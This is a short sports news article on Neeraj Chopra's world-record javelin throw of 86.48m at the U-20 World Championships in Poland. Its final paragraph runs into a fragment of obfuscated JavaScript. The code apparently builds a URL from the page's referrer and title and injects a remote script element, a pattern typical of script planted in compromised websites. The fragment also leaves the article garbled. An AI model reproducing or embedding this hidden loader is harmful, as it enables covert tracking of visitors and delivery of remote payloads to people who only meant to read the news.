Glorious history has been created by Javelin thrower Neeraj Chopra by becoming the first Indian athlete to set a world record on his way to win a gold medal at the IAAF World U-20 Athletics Championship at Bydgoszcz in Poland.

Neeraj belongs to Khandra village of Panipat. He registered a throw of 86.48m to become the first Indian athlete to win gold at any world athletics championship.

His first round was kicked off by the 18-year-old Indian athlete with a throw of 79.66m that put him in second place before he bounced back strongly to post the world record in his second attempt.

South Africaas Johan Grobler finished second with a throw of 80.59m ahead of Grenadaas Anderson Peters, who logged 79.69m.

With the feat, Chopra has also broken the old world record of 84.69 metres held by Latvian Zigismunds Sirmais.
His previous personal best of 82.23 was also bettered by him, set at the South Asian Games earlier this year, which was incidentally a national record.

Neeraj was also put ahead of reigning defending Olympic gold medalist Keshorn Walcott by his throw, who recorded his best at 86.35m in 2016. b322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
